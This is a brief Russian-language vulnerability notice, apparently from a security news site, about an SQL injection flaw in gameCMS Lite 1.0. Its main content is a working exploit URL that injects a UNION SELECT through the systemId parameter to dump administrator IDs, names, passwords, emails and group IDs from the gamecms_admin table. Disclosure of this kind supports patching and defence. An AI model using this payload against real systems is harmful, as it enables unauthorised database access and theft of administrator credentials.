Программа: gameCMS Lite 1.0

Удаленный нападающий может выполнить произвольные SQL-запросы в базе данных приложения.

Эксплоит:

http://target/index.php?systemId=5'+union+select+1,2,concat_ws (0x3a3a,adminId,name,password,email,groupId),4,5+ from+gamecms_admin/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии